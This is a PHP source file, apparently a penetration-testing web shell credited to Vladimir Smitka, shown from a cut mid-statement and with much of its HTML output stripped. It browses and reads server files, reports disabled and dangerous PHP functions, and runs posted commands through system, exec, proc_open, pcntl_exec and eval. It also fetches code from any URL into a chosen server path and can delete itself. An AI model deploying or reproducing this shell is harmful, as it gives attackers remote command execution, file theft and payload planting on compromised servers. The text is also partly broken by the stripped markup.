$aging) || isset($_GET['remove'])) { if (unlink(__FILE__)) die('removed!'); else die('not removed!'); } date_default_timezone_set($timezone); $method = isset($_GET['m']) ? $_GET['m'] : 'php'; if ($download && isset($_GET['down'])) { download($_GET['down'], $method); } main(__DIR__, $download, $upload, $read, $console, $method, $base64_paths); function main($dir, $download, $upload, $read, $console, $method, $base64_paths) { echo ""; echo ""; echo "
File browsing: switch to php
"; break; default: $files = list_directory_php($dir); $r = is_enabled('shell_exec'); if ($r[1] === 'b') echo "File browsing: switch to shell_exec
"; break; } echo "| "; if ($file['isDir']) { if ($file['name'] === '..') echo "[ UP ]"; elseif ($file['name'] === '.') echo $file['path']; else echo "{$file["name"]}"; } else { echo $file["name"]; } echo " | "; echo "{$file['perm']} {$file['owner']} | "; echo "{$file['my_perm']} | "; echo "{$file['time']} | "; echo ""; if ($download && $file['base64']) echo "download "; if ($read && $file['base64']) echo "read "; echo $file['size']; echo " |
Current script: '. __FILE__ . '
'; echo 'PHP version: ' . f('phpversion') . ' @ ' . f('php_uname') . ' [' . f('php_sapi_name') . ']
'; echo 'PHP extensions: ' . implode(', ', f('get_loaded_extensions')) . '
'; echo 'PHP disable functions: ' . ini_get('disable_functions') . '
'; echo 'PHP dangerous functions: '; echo is_enabled('system') . ' '; echo is_enabled('exec') . ' '; echo is_enabled('shell_exec') . ' '; echo is_enabled('passthru') . ' '; echo is_enabled('proc_open') . ' '; echo is_enabled('popen') . ' '; echo is_enabled('pcntl_exec') . ' '; echo is_enabled('putenv') . ' '; echo '
'; echo 'Open Basedir: '; $basedirs = explode(":", ini_get('open_basedir')); $num = sizeof($basedirs); for ($i = 0; $i < $num; $i++) { echo '' . $basedirs[$i] . ' '; } echo '
'; if ($read) echo ''; echo ''; if (isset($_GET['info'])) { f('phpinfo'); } echo ""; echo "Author: Vladimir Smitka, Lynt services s.r.o., Security Blog, GitHub
"; } function list_directory_php($dir) { $files = scandir($dir); $fileList = array(); foreach ($files as $file) { $real = @realpath($dir . DIRECTORY_SEPARATOR . $file); if ($real === false) continue; $isDir = is_dir($real); $perm = get_perms($real); $my_perm = ''; if (f('is_readable',$real)) $my_perm .= 'R'; if (f('is_writable',$real)) $my_perm .= 'W'; if (f('is_executable',$real)) $my_perm .= 'X'; $owner = ''; if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) { $pwuid = posix_getpwuid(fileowner($real)); $grgid = posix_getgrgid(fileowner($real)); $owner = $pwuid['name'] . ":" . $grgid['name']; } $time = date('Y-m-d H:i:s', filemtime($real)); $size = is_dir($real) ? '' : FileSizeConvert(filesize($real)); $base64 = f('is_readable',$real) && !$isDir ? base64_encode($real) : ''; $fileList[] = array( 'name' => $file, 'path' => $real, 'isDir' => $isDir, 'perm' => $perm, 'my_perm' => $my_perm, 'owner' => $owner, 'time' => $time, 'size' => $size, 'base64' => $base64 ); } return $fileList; } function list_directory_shell($dir) { $output = shell_exec("ls -la --time-style=full-iso " . escapeshellarg($dir)); $lines = explode("\n", trim($output)); $fileList = array(); foreach ($lines as $line) { $line = trim($line); if ($line === '' || strpos($line, 'total ') === 0) continue; $parts = preg_split('/\s+/', $line, 9); if (count($parts) < 9) continue; $file = $parts[8]; $real = emul_realpath($dir . DIRECTORY_SEPARATOR . $file); $isDir = $parts[0][0] === 'd'; $perm = substr($parts[0], 1); $my_perm = ''; if (strpos($perm, 'r') !== false) $my_perm .= 'R'; if (strpos($perm, 'w') !== false) $my_perm .= 'W'; if (strpos($perm, 'x') !== false) $my_perm .= 'X'; $owner = $parts[2] . ':' . $parts[3]; list($timePart) = explode(".", $parts[6]); $time = date('Y-m-d H:i:s', strtotime($parts[5] . ' ' . $timePart)); $size = $isDir ? '' : FileSizeConvert($parts[4]); $base64 = strpos($perm, 'r') !== false && !$isDir ? base64_encode($real) : ''; $fileList[] = array( 'name' => $file, 'path' => $real, 'isDir' => $isDir, 'perm' => $perm, 'my_perm' => $my_perm, 'owner' => $owner, 'time' => $time, 'size' => $size, 'base64' => $base64 ); } return $fileList; } function get_perms($file) { $perms = fileperms($file); switch ($perms & 0xF000) { case 0xC000: // socket $info = 's'; break; case 0xA000: // symbolic link $info = 'l'; break; case 0x8000: // regular $info = '-'; break; case 0x6000: // block special $info = 'b'; break; case 0x4000: // directory $info = 'd'; break; case 0x2000: // character special $info = 'c'; break; case 0x1000: // FIFO pipe $info = 'p'; break; default: // unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } function upload() { $defaultFilePath = __DIR__ . '/mfb-file.php'; echo ''; if (isset($_POST['fileUpload'])) { $fileUrl = $_POST['fileUrl']; $filePath = $_POST['filePath']; $fileContent = file_get_contents($fileUrl); if ($fileContent !== false) { file_put_contents($filePath, $fileContent); } } } function console() { $method = isset($_POST['method']) ? $_POST['method'] : 'system'; echo ''; if (isset($_POST['command'])) { $command = escapeshellcmd($_POST['command']); echo '';
switch ($_POST['method']) {
case 'system':
echo system($command);
break;
case 'backtick':
echo `$command`;
break;
case 'exec':
exec($command, $tmp);
print_r($tmp);
break;
case 'shell_exec':
echo shell_exec($command);
break;
case 'passthru':
passthru($command);
break;
case 'eval':
echo eval_code($_POST['command']);
break;
case 'proc_open':
$pr = proc_open($command, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $pipes);
echo stream_get_contents($pipes[1]);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
break;
case 'popen':
$fp = popen($command, "r");
echo stream_get_contents($fp);
fclose($fp);
break;
case 'pcntl_exec':
header("Refresh:1");
pcntl_exec('/bin/sh', array('-c', $command . ' > this_is_pcntl_exec_outfile.txt'));
break;
}
echo '';
echo file_get_contents('this_is_pcntl_exec_outfile.txt');
echo "";
unlink('this_is_pcntl_exec_outfile.txt');
}
}
function eval_code($code)
{
if (!preg_match('/\breturn\b/', $code)) {
$code = 'return ' . $code;
}
if (substr(trim($code), -1) !== ';') {
$code .= ';';
}
try {
$result = eval ($code);
} catch (ParseError $e) {
return 'Parse error: ' . $e->getMessage();
}
return $result;
}
function emul_realpath($path)
{
$folders = explode('/', $path);
$stack = array();
foreach ($folders as $folder) {
if ($folder === '..') {
array_pop($stack);
} elseif ($folder !== '' && $folder !== '.') {
array_push($stack, $folder);
}
}
$result = '/' . implode('/', $stack);
if (substr($path, -1) === '/') {
$result .= '/';
}
return $result;
}
function modify_url($key, $value)
{
$parts = parse_url($_SERVER['REQUEST_URI']);
parse_str(isset($parts['query']) ? $parts['query'] : '', $query);
$query[$key] = $value;
$parts['query'] = http_build_query($query);
return $parts['path'] . '?' . $parts['query'];
}
function FileSizeConvert($bytes)
{
$units = array("TB" => pow(1024, 4), "GB" => pow(1024, 3), "MB" => pow(1024, 2), "kB" => 1024, "B" => 1);
foreach ($units as $unit => $value) {
if ($bytes >= $value) {
return str_replace(".", ",", round($bytes / $value, 2)) . " " . $unit;
}
}
return '0 B';
}
function is_enabled($func)
{
if (!function_exists($func)) {
return "File: $file
"; $ext = pathinfo($file, PATHINFO_EXTENSION); $file_name = pathinfo($file, PATHINFO_BASENAME); echo "";
ob_start();
switch ($method) {
case "php":
readfile($file);
break;
case "shell_exec":
echo shell_exec("cat " . escapeshellarg($file) . " 2>&1");
break;
}
$content = ob_get_clean();
$is_img = false;
$is_archive = false;
$mime = 'text/plain';
switch ($ext) {
case "jpg":
$is_img = true;
$mime = 'image/jpeg';
break;
case "jpeg":
$is_img = true;
$mime = 'image/jpeg';
break;
case "png":
$is_img = true;
$mime = 'image/png';
break;
case "gif":
$is_img = true;
$mime = 'image/gif';
break;
case "webp":
$is_img = true;
$mime = 'image/webp';
break;
case "svg":
$is_img = true;
$mime = 'image/svg+xml';
break;
case "zip":
$is_archive = true;
break;
case "tgz":
$is_archive = true;
break;
case "tar":
$is_archive = true;
break;
case "gz":
$is_archive = true;
break;
default:
$is_img = false;
}
if ($is_img) {
echo '
';
} elseif ($is_archive) {
read_archive($content, $file_name);
} else {
echo htmlspecialchars($content);
}
echo "";
}
function read_archive($content, $file_name)
{
if (class_exists("PharData")) {
$temp = sys_get_temp_dir() . '/mfb-archive-' . $file_name;
file_put_contents($temp, $content);
$phar = new PharData($temp);
echo "Archive files: